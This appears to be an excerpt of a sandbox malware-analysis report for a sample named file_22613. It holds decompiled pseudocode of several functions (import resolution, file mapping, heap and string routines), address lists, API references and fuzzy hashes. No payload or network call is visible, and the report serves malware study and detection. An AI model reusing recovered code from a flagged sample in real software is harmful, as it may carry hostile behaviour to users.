                                                                                								__eflags = _t38;
                                                                                								if(_t38 == 0) {
                                                                                									_t45 = 0x10;
                                                                                								} else {
                                                                                									_t45 = _t38 + _t38;
                                                                                								}
                                                                                								 *(_t70 + 0x154) = _t45;
                                                                                								_t67 = E0041E042(_t64, _t69, _t70, _t45 << 2);
                                                                                								_v16 = _t67;
                                                                                								__eflags = _t67;
                                                                                								if(_t67 == 0) {
                                                                                									_push(3);
                                                                                									goto L27;
                                                                                								} else {
                                                                                									_t48 =  *(_t70 + 0x150);
                                                                                									__eflags = _t48;
                                                                                									if(_t48 != 0) {
                                                                                										__eflags = _t48 << 2;
                                                                                										E00421230(_t67,  *(_t70 + 0x14c), _t48 << 2);
                                                                                										_t72 = _t72 + 0xc;
                                                                                									}
                                                                                									E0041E008( *(_t70 + 0x14c));
                                                                                									 *(_t70 + 0x14c) = _t67;
                                                                                									L13:
                                                                                									 *((intOrPtr*)(_t67 +  *(_t70 + 0x150) * 4)) = _v12;
                                                                                									 *(_t70 + 0x150) =  *(_t70 + 0x150) + 1;
                                                                                									_t40 =  *((intOrPtr*)(_t70 + 0x144));
                                                                                									_t69 =  *((intOrPtr*)(_t55 + 0x10)) + _t40;
                                                                                									__eflags =  *(_t55 + 4);
                                                                                									_v8 = _t69;
                                                                                									if( *(_t55 + 4) == 0) {
                                                                                										goto L21;
                                                                                									} else {
                                                                                										_t60 =  *_t55;
                                                                                										__eflags = _t60;
                                                                                										if(_t60 == 0) {
                                                                                											_push(8);
                                                                                											L27:
                                                                                											_pop(0);
                                                                                										} else {
                                                                                											_v8 = _t60 + _t40;
                                                                                											while(1) {
                                                                                												L21:
                                                                                												_t42 =  *_v8;
                                                                                												__eflags = _t42;
                                                                                												if(__eflags == 0) {
                                                                                													break;
                                                                                												}
                                                                                												if(__eflags >= 0) {
                                                                                													_t43 = _t42 +  *((intOrPtr*)(_t70 + 0x144)) + 2;
                                                                                												} else {
                                                                                													_t43 = _t42 & 0x0000ffff;
                                                                                												}
                                                                                												_t44 = GetProcAddress(_v12, _t43);
                                                                                												 *_t69 = _t44;
                                                                                												__eflags = _t44;
                                                                                												if(_t44 == 0) {
                                                                                													goto L26;
                                                                                												} else {
                                                                                													_v8 =  &(_v8[2]);
                                                                                													_t69 = _t69 + 4;
                                                                                													__eflags = _t69;
                                                                                													continue;
                                                                                												}
                                                                                												goto L25;
                                                                                											}
                                                                                											_t55 = _t55 + 0x14;
                                                                                											__eflags = _t55;
                                                                                											continue;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L25;
                                                                                					}
                                                                                					goto L24;
                                                                                				}
                                                                                				L25:
                                                                                				return 0;
                                                                                			}

























                                                                                0x00402ef4
                                                                                0x00402ef7
                                                                                0x00402efd
                                                                                0x00402f04
                                                                                0x00402f1d
                                                                                0x0040300f
                                                                                0x0040300f
                                                                                0x00403014
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402f2d
                                                                                0x00402f33
                                                                                0x00402f36
                                                                                0x00402f38
                                                                                0x00403020
                                                                                0x00403020
                                                                                0x00000000
                                                                                0x00402f3e
                                                                                0x00402f3e
                                                                                0x00402f44
                                                                                0x00402f4a
                                                                                0x00402fa5
                                                                                0x00000000
                                                                                0x00402f4c
                                                                                0x00402f4c
                                                                                0x00402f4e
                                                                                0x00402f56
                                                                                0x00402f50
                                                                                0x00402f50
                                                                                0x00402f50
                                                                                0x00402f57
                                                                                0x00402f66
                                                                                0x00402f69
                                                                                0x00402f6c
                                                                                0x00402f6e
                                                                                0x00403025
                                                                                0x00000000
                                                                                0x00402f74
                                                                                0x00402f74
                                                                                0x00402f7a
                                                                                0x00402f7c
                                                                                0x00402f7e
                                                                                0x00402f89
                                                                                0x00402f8e
                                                                                0x00402f8e
                                                                                0x00402f97
                                                                                0x00402f9d
                                                                                0x00402fa8
                                                                                0x00402fb1
                                                                                0x00402fb4
                                                                                0x00402fba
                                                                                0x00402fc3
                                                                                0x00402fc5
                                                                                0x00402fc9
                                                                                0x00402fcc
                                                                                0x00000000
                                                                                0x00402fce
                                                                                0x00402fce
                                                                                0x00402fd0
                                                                                0x00402fd2
                                                                                0x00403029
                                                                                0x00403022
                                                                                0x00403022
                                                                                0x00402fd4
                                                                                0x00402fd6
                                                                                0x00403003
                                                                                0x00403003
                                                                                0x00403006
                                                                                0x00403008
                                                                                0x0040300a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402fdb
                                                                                0x00402fe8
                                                                                0x00402fdd
                                                                                0x00402fdd
                                                                                0x00402fdd
                                                                                0x00402ff0
                                                                                0x00402ff6
                                                                                0x00402ff8
                                                                                0x00402ffa
                                                                                0x00000000
                                                                                0x00402ffc
                                                                                0x00402ffc
                                                                                0x00403000
                                                                                0x00403000
                                                                                0x00000000
                                                                                0x00403000
                                                                                0x00000000
                                                                                0x00402ffa
                                                                                0x0040300c
                                                                                0x0040300c
                                                                                0x00000000
                                                                                0x0040300c
                                                                                0x00402fd2
                                                                                0x00402fcc
                                                                                0x00402f6e
                                                                                0x00402f4a
                                                                                0x00000000
                                                                                0x00402f38
                                                                                0x00000000
                                                                                0x0040300f
                                                                                0x0040301c
                                                                                0x0040301f

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad_free_malloc_memmove
                                                                                • String ID:
                                                                                • API String ID: 2732542392-0
                                                                                • Opcode ID: 21204ec43521b1d0ce1f2020ebcb66b3aced4a8fa59d7f199c40dc3aa222434b
                                                                                • Instruction ID: b0f97d1e2ba6270cb94c2f27e2f8f5c978a14479b632636112cca3c8844dfc58
                                                                                • Opcode Fuzzy Hash: 21204ec43521b1d0ce1f2020ebcb66b3aced4a8fa59d7f199c40dc3aa222434b
                                                                                • Instruction Fuzzy Hash: E0319C75601702EBDB21CF64C944BABBBF8AB44345F14443AE84AE73C4E678E9019B28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E0041C36F(void* __eax, signed int __ecx, long __edi, void* __esi, intOrPtr _a4) {
                                                                                				void* _t32;
                                                                                				void* _t33;
                                                                                				void* _t39;
                                                                                				signed int _t41;
                                                                                				signed int _t43;
                                                                                				signed char _t45;
                                                                                				long _t49;
                                                                                				void* _t50;
                                                                                
                                                                                				_t50 = __esi;
                                                                                				_t49 = __edi;
                                                                                				_t43 = __ecx;
                                                                                				if( *(__esi + 4) != 0 ||  *(__esi + 0xc) != 0 ||  *(__esi + 0x20) != 0 ||  *((intOrPtr*)(__esi + 0x18)) != 0 ||  *((intOrPtr*)(__esi + 0x14)) != 0 ||  *((intOrPtr*)(__esi + 0x2c)) != 0) {
                                                                                					return 0x1000000;
                                                                                				} else {
                                                                                					if(_a4 != 1) {
                                                                                						__eflags = _a4 - 2;
                                                                                						if(__eflags != 0) {
                                                                                							__eflags = _a4 - 3;
                                                                                							if(_a4 != 3) {
                                                                                								return 0x10000;
                                                                                							}
                                                                                							__eflags = __edi;
                                                                                							if(__edi != 0) {
                                                                                								__eflags = __eax;
                                                                                								if(__eax == 0) {
                                                                                									_t32 = CreateFileMappingW(0xffffffff, 0, 4, 0, __edi, 0);
                                                                                									 *(__esi + 0xc) = _t32;
                                                                                									__eflags = _t32;
                                                                                									if(_t32 != 0) {
                                                                                										_t33 = MapViewOfFile(_t32, 0xf001f, 0, 0, __edi);
                                                                                										 *(__esi + 0x20) = _t33;
                                                                                										__eflags = _t33;
                                                                                										if(_t33 != 0) {
                                                                                											L18:
                                                                                											 *((char*)(_t50 + 0x1c)) = 1;
                                                                                											 *((intOrPtr*)(_t50 + 0x24)) = 0;
                                                                                											 *(_t50 + 0x28) = _t49;
                                                                                											L8:
                                                                                											return 0;
                                                                                										}
                                                                                										CloseHandle( *(__esi + 0xc));
                                                                                										 *(__esi + 0xc) = 0;
                                                                                									}
                                                                                									return 0x300;
                                                                                								}
                                                                                								 *(__esi + 0x20) = __eax;
                                                                                								goto L18;
                                                                                							}
                                                                                							return 0x30000;
                                                                                						}
                                                                                						_t39 = CreateFileW(E00419C2F(__eflags, __eax), 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                						 *(__esi + 4) = _t39;
                                                                                						__eflags = _t39 - 0xffffffff;
                                                                                						if(_t39 != 0xffffffff) {
                                                                                							 *(__esi + 0x1c) = 1;
                                                                                							 *(__esi + 0x10) = 0;
                                                                                							 *((char*)(__esi + 8)) = 1;
                                                                                							goto L8;
                                                                                						}
                                                                                						 *(__esi + 4) = 0;
                                                                                						return 0x200;
                                                                                					}
                                                                                					 *(__esi + 4) = __eax;
                                                                                					 *((char*)(__esi + 8)) = 0;
                                                                                					_t41 = SetFilePointer(__eax, 0, 0, 1);
                                                                                					_t45 = _t43 & 0xffffff00 | _t41 != 0xffffffff;
                                                                                					 *(__esi + 0x1c) = _t45;
                                                                                					asm("sbb ecx, ecx");
                                                                                					 *(__esi + 0x10) =  ~(_t45 & 0x000000ff) & _t41;
                                                                                					goto L8;
                                                                                				}
                                                                                			}











                                                                                0x0041c36f
                                                                                0x0041c36f
                                                                                0x0041c36f
                                                                                0x0041c375
                                                                                0x00000000
                                                                                0x0041c3a8
                                                                                0x0041c3ad
                                                                                0x0041c3dc
                                                                                0x0041c3e1
                                                                                0x0041c41f
                                                                                0x0041c424
                                                                                0x00000000
                                                                                0x0041c484
                                                                                0x0041c426
                                                                                0x0041c428
                                                                                0x0041c431
                                                                                0x0041c433
                                                                                0x0041c44c
                                                                                0x0041c452
                                                                                0x0041c455
                                                                                0x0041c457
                                                                                0x0041c469
                                                                                0x0041c46f
                                                                                0x0041c472
                                                                                0x0041c474
                                                                                0x0041c438
                                                                                0x0041c438
                                                                                0x0041c43c
                                                                                0x0041c43f
                                                                                0x0041c3d5
                                                                                0x00000000
                                                                                0x0041c3d5
                                                                                0x0041c479
                                                                                0x0041c47f
                                                                                0x0041c47f
                                                                                0x00000000
                                                                                0x0041c459
                                                                                0x0041c435
                                                                                0x00000000
                                                                                0x0041c435
                                                                                0x00000000
                                                                                0x0041c42a
                                                                                0x0041c3fa
                                                                                0x0041c400
                                                                                0x0041c403
                                                                                0x0041c406
                                                                                0x0041c412
                                                                                0x0041c416
                                                                                0x0041c419
                                                                                0x00000000
                                                                                0x0041c419
                                                                                0x0041c408
                                                                                0x00000000
                                                                                0x0041c40b
                                                                                0x0041c3b4
                                                                                0x0041c3b7
                                                                                0x0041c3ba
                                                                                0x0041c3c3
                                                                                0x0041c3c6
                                                                                0x0041c3ce
                                                                                0x0041c3d2
                                                                                0x00000000
                                                                                0x0041c3d2

                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,0041D2AA,?,00000004,00409A8F,?), ref: 0041C3BA
                                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041D2AA,?,00000004,00409A8F,?), ref: 0041C3FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreatePointer
                                                                                • String ID:
                                                                                • API String ID: 2024441833-0
                                                                                • Opcode ID: f7d817a8635adb1b2a4b09a9d11919786a18b35ba17e2b49d210922c817dc4a4
                                                                                • Instruction ID: 1eff4128bb8c17c9b75ca74513e4c6c10363b5fc03f10ddc45af2330108476ed
                                                                                • Opcode Fuzzy Hash: f7d817a8635adb1b2a4b09a9d11919786a18b35ba17e2b49d210922c817dc4a4
                                                                                • Instruction Fuzzy Hash: 653164B05887519FD7309F758CD4777BAE8BB18358F10CA2FF19682A81D27898C48B5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E00420AB3(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                                				void* _t7;
                                                                                				long _t8;
                                                                                				intOrPtr* _t9;
                                                                                				intOrPtr* _t12;
                                                                                				long _t27;
                                                                                				long _t30;
                                                                                
                                                                                				if(_a4 != 0) {
                                                                                					_push(__esi);
                                                                                					_t30 = _a8;
                                                                                					__eflags = _t30;
                                                                                					if(_t30 != 0) {
                                                                                						_push(__edi);
                                                                                						while(1) {
                                                                                							__eflags = _t30 - 0xffffffe0;
                                                                                							if(_t30 > 0xffffffe0) {
                                                                                								break;
                                                                                							}
                                                                                							__eflags = _t30;
                                                                                							if(_t30 == 0) {
                                                                                								_t30 = _t30 + 1;
                                                                                								__eflags = _t30;
                                                                                							}
                                                                                							_t7 = HeapReAlloc( *0x449158, 0, _a4, _t30);
                                                                                							_t27 = _t7;
                                                                                							__eflags = _t27;
                                                                                							if(_t27 != 0) {
                                                                                								L17:
                                                                                								_t8 = _t27;
                                                                                							} else {
                                                                                								__eflags =  *0x44978c - _t7;
                                                                                								if(__eflags == 0) {
                                                                                									_t9 = E00423E5B(__eflags);
                                                                                									 *_t9 = E00423E19(GetLastError());
                                                                                									goto L17;
                                                                                								} else {
                                                                                									__eflags = E0042482A(_t7, _t30);
                                                                                									if(__eflags == 0) {
                                                                                										_t12 = E00423E5B(__eflags);
                                                                                										 *_t12 = E00423E19(GetLastError());
                                                                                										L12:
                                                                                										_t8 = 0;
                                                                                										__eflags = 0;
                                                                                									} else {
                                                                                										continue;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L14;
                                                                                						}
                                                                                						E0042482A(_t6, _t30);
                                                                                						 *((intOrPtr*)(E00423E5B(__eflags))) = 0xc;
                                                                                						goto L12;
                                                                                					} else {
                                                                                						E0041E008(_a4);
                                                                                						_t8 = 0;
                                                                                					}
                                                                                					L14:
                                                                                					return _t8;
                                                                                				} else {
                                                                                					return E0041E042(__edx, __edi, __esi, _a8);
                                                                                				}
                                                                                			}









                                                                                0x00420abc
                                                                                0x00420ac9
                                                                                0x00420aca
                                                                                0x00420acd
                                                                                0x00420acf
                                                                                0x00420ade
                                                                                0x00420b11
                                                                                0x00420b11
                                                                                0x00420b14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00420ae1
                                                                                0x00420ae3
                                                                                0x00420ae5
                                                                                0x00420ae5
                                                                                0x00420ae5
                                                                                0x00420af2
                                                                                0x00420af8
                                                                                0x00420afa
                                                                                0x00420afc
                                                                                0x00420b5c
                                                                                0x00420b5c
                                                                                0x00420afe
                                                                                0x00420afe
                                                                                0x00420b04
                                                                                0x00420b46
                                                                                0x00420b5a
                                                                                0x00000000
                                                                                0x00420b06
                                                                                0x00420b0d
                                                                                0x00420b0f
                                                                                0x00420b2e
                                                                                0x00420b42
                                                                                0x00420b28
                                                                                0x00420b28
                                                                                0x00420b28
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00420b0f
                                                                                0x00420b04
                                                                                0x00000000
                                                                                0x00420b2a
                                                                                0x00420b17
                                                                                0x00420b22
                                                                                0x00000000
                                                                                0x00420ad1
                                                                                0x00420ad4
                                                                                0x00420ada
                                                                                0x00420ada
                                                                                0x00420b2b
                                                                                0x00420b2d
                                                                                0x00420abe
                                                                                0x00420ac8
                                                                                0x00420ac8

                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 00420AC1
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • _free.LIBCMT ref: 00420AD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free_malloc
                                                                                • String ID:
                                                                                • API String ID: 1020059152-0
                                                                                • Opcode ID: 313411e567a504e90aaf4b428f65e1b85b5cdf5dbe1de00aeaa4a50b97d5d91e
                                                                                • Instruction ID: 08f9d9b0e77d6452fabf12e62ecdd3381a7805b645ad4c3961844af03e51d9a5
                                                                                • Opcode Fuzzy Hash: 313411e567a504e90aaf4b428f65e1b85b5cdf5dbe1de00aeaa4a50b97d5d91e
                                                                                • Instruction Fuzzy Hash: 6011B636700635AFCF316FB5B80465B3BE49F413A9B91442BF84997252DE3C9D41869C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E0040F445(CHAR* _a4, CHAR* _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				int _t7;
                                                                                				CHAR* _t8;
                                                                                				CHAR* _t9;
                                                                                				CHAR* _t12;
                                                                                				int _t15;
                                                                                				int _t16;
                                                                                				void* _t17;
                                                                                				CHAR* _t18;
                                                                                				CHAR** _t19;
                                                                                				void* _t21;
                                                                                				CHAR* _t22;
                                                                                				CHAR** _t23;
                                                                                				int _t24;
                                                                                				CHAR* _t26;
                                                                                
                                                                                				_t7 = lstrlenA(_a4);
                                                                                				_t22 = _a8;
                                                                                				_t24 = _t7;
                                                                                				_t8 = _t22;
                                                                                				if(_t22 != 0) {
                                                                                					_t19 =  &_a8;
                                                                                					do {
                                                                                						_t16 = lstrlenA(_t8);
                                                                                						_t19 =  &(_t19[1]);
                                                                                						_t24 = _t24 + _t16;
                                                                                						_t8 =  *_t19;
                                                                                						_t28 = _t8;
                                                                                					} while (_t8 != 0);
                                                                                				}
                                                                                				_t9 = E0041D474(_t17, _t21, _t22, _t24 + 1, _t28, _t24 + 1);
                                                                                				_t18 = _t9;
                                                                                				 *0x44a220(_t18, _a4);
                                                                                				_t26 =  &(_t18[lstrlenA(_t18)]);
                                                                                				_t12 = _t22;
                                                                                				if(_t22 != 0) {
                                                                                					_t23 =  &_a8;
                                                                                					do {
                                                                                						 *0x44a220(_t26, _t12);
                                                                                						_t15 = lstrlenA(_t26);
                                                                                						_t23 =  &(_t23[1]);
                                                                                						_t26 =  &(_t26[_t15]);
                                                                                						_t12 =  *_t23;
                                                                                					} while (_t12 != 0);
                                                                                				}
                                                                                				return _t18;
                                                                                			}




















                                                                                0x0040f44e
                                                                                0x0040f454
                                                                                0x0040f457
                                                                                0x0040f459
                                                                                0x0040f45d
                                                                                0x0040f45f
                                                                                0x0040f462
                                                                                0x0040f463
                                                                                0x0040f469
                                                                                0x0040f46c
                                                                                0x0040f46e
                                                                                0x0040f470
                                                                                0x0040f470
                                                                                0x0040f462
                                                                                0x0040f476
                                                                                0x0040f47f
                                                                                0x0040f482
                                                                                0x0040f48f
                                                                                0x0040f492
                                                                                0x0040f496
                                                                                0x0040f498
                                                                                0x0040f49b
                                                                                0x0040f49d
                                                                                0x0040f4a4
                                                                                0x0040f4aa
                                                                                0x0040f4ad
                                                                                0x0040f4af
                                                                                0x0040f4b1
                                                                                0x0040f49b
                                                                                0x0040f4bb

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00000104,00000000,014A06E0,?,?,00413C88,00000000,00440C68,014A06E0,00000000,014A10F8,00000104,00413E0B), ref: 0040F44E
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 0040F463
                                                                                • lstrcpy.KERNEL32(00000000,?), ref: 0040F482
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040F489
                                                                                • lstrcpy.KERNEL32(00000001,?), ref: 0040F49D
                                                                                • lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 0040F4A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcpy
                                                                                • String ID:
                                                                                • API String ID: 805584807-0
                                                                                • Opcode ID: c0520812aa2ba09dd322cf99fd8be3b8f93583b023992963ce0cfb3f49bdd848
                                                                                • Instruction ID: 85f67f6f1b018092bdea60e2615b28a2843bab97769f3ac34907459ecdd801eb
                                                                                • Opcode Fuzzy Hash: c0520812aa2ba09dd322cf99fd8be3b8f93583b023992963ce0cfb3f49bdd848
                                                                                • Instruction Fuzzy Hash: 4601B17B2002146FDB108F28EC48D6B7B68EF493687050131FD09E3311D739DE158A99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00C78995
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __amsg_exit.LIBCMT ref: 00C789B5
                                                                                • __lock.LIBCMT ref: 00C789C5
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00C789E2
                                                                                • InterlockedIncrement.KERNEL32(02FC2CB0), ref: 00C78A0D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 4271482742-0
                                                                                • Opcode ID: 8805252bcb0aaeb21f3ed07ba593440fc71808a3cba6de357165f85efaefb2a8
                                                                                • Instruction ID: c4438492ca2b06f7a5c48fc833c0ccafc3146d7d3bf47c569292ddf3bb282106
                                                                                • Opcode Fuzzy Hash: 8805252bcb0aaeb21f3ed07ba593440fc71808a3cba6de357165f85efaefb2a8
                                                                                • Instruction Fuzzy Hash: 6B01DB31D41B119BDB24AF759809B6D77A0BF01731F088215EA28B3390CF74A945EFD2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00C71C0B
                                                                                  • Part of subcall function 00C73FBC: __mtinitlocknum.LIBCMT ref: 00C73FD2
                                                                                  • Part of subcall function 00C73FBC: __amsg_exit.LIBCMT ref: 00C73FDE
                                                                                  • Part of subcall function 00C73FBC: EnterCriticalSection.KERNEL32(00C71E80,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001), ref: 00C73FE6
                                                                                • ___sbh_find_block.LIBCMT ref: 00C71C16
                                                                                • ___sbh_free_block.LIBCMT ref: 00C71C25
                                                                                • HeapFree.KERNEL32(00000000,00000000,00DAAAF0,0000000C,00C73F9D,00000000,00DAABD0,0000000C,00C73FD7,00000000,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C), ref: 00C71C55
                                                                                • GetLastError.KERNEL32(?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001,00000214), ref: 00C71C66
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2714421763-0
                                                                                • Opcode ID: 602fc02b5f7ff56b19f13b7e922164f6aa5d921c5da4bc6ff4f36334c4b4dec2
                                                                                • Instruction ID: c0dc9e20cd85a8cbcdb548aa9a86617f45050aa0170120427b4f2554236d1ffe
                                                                                • Opcode Fuzzy Hash: 602fc02b5f7ff56b19f13b7e922164f6aa5d921c5da4bc6ff4f36334c4b4dec2
                                                                                • Instruction Fuzzy Hash: 9001A231844341AADF357FF99C0AB5E7BA49F01761F18C109FD2DA6191DB788A80EA54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040F003(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t35 = __edi;
                                                                                				_push(0xc);
                                                                                				E00421975(E00435B74, __ebx, __edi, __esi);
                                                                                				_t37 =  *((intOrPtr*)(_t38 + 8));
                                                                                				E0041D582(_t37, 0);
                                                                                				 *((intOrPtr*)(_t38 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 4)) = 0;
                                                                                				 *((char*)(_t37 + 8)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                				 *((char*)(_t37 + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 0x14)) = 0;
                                                                                				 *((char*)(_t37 + 0x18)) = 0;
                                                                                				 *((intOrPtr*)(_t37 + 0x1c)) = 0;
                                                                                				 *((char*)(_t37 + 0x20)) = 0;
                                                                                				 *((char*)(_t38 - 4)) = 4;
                                                                                				_t40 =  *(_t38 + 0xc);
                                                                                				if( *(_t38 + 0xc) == 0) {
                                                                                					 *(_t38 + 0xc) = "bad locale name";
                                                                                					E0041E15E(_t38 - 0x18, _t38 + 0xc);
                                                                                					 *((intOrPtr*)(_t38 - 0x18)) = 0x4382f8;
                                                                                					E00421126(_t38 - 0x18, 0x444218);
                                                                                				}
                                                                                				E0041D8D9(0, _t35, _t37, _t40, _t37,  *(_t38 + 0xc));
                                                                                				return E00421A4D(_t37);
                                                                                			}





                                                                                0x0040f003
                                                                                0x0040f003
                                                                                0x0040f00a
                                                                                0x0040f00f
                                                                                0x0040f017
                                                                                0x0040f01c
                                                                                0x0040f01f
                                                                                0x0040f022
                                                                                0x0040f025
                                                                                0x0040f028
                                                                                0x0040f02b
                                                                                0x0040f02e
                                                                                0x0040f031
                                                                                0x0040f034
                                                                                0x0040f037
                                                                                0x0040f03b
                                                                                0x0040f03e
                                                                                0x0040f047
                                                                                0x0040f04e
                                                                                0x0040f05c
                                                                                0x0040f063
                                                                                0x0040f063
                                                                                0x0040f06c
                                                                                0x0040f07a

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040F00A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040F017
                                                                                • std::exception::exception.LIBCMT ref: 0040F04E
                                                                                  • Part of subcall function 0041E15E: std::exception::_Copy_str.LIBCMT ref: 0041E179
                                                                                • __CxxThrowException@8.LIBCMT ref: 0040F063
